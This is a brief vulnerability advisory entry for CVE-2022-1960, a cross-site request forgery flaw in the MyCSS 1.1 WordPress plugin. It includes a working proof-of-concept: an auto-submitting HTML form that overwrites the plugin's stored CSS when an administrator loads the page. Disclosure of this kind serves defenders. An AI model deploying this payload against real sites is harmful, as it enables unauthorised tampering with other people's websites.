CVE: CVE-2022-1960

Name: MyCSS (mycss)

Version: 1.1

Date: 2022-04-19 20:24:32

Advisory: https://wpscan.com/vulnerability/bc97dd57-e9f6-4bc3-a4c2-40303786ae4a

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/themes.php?page=mycss.php" method="POST">
    <input type="text" name="newcontent" value="">
    <input type="text" name="info_update" value="Update CSS">
</form>
<script>
    document.forms[0].submit();
</script>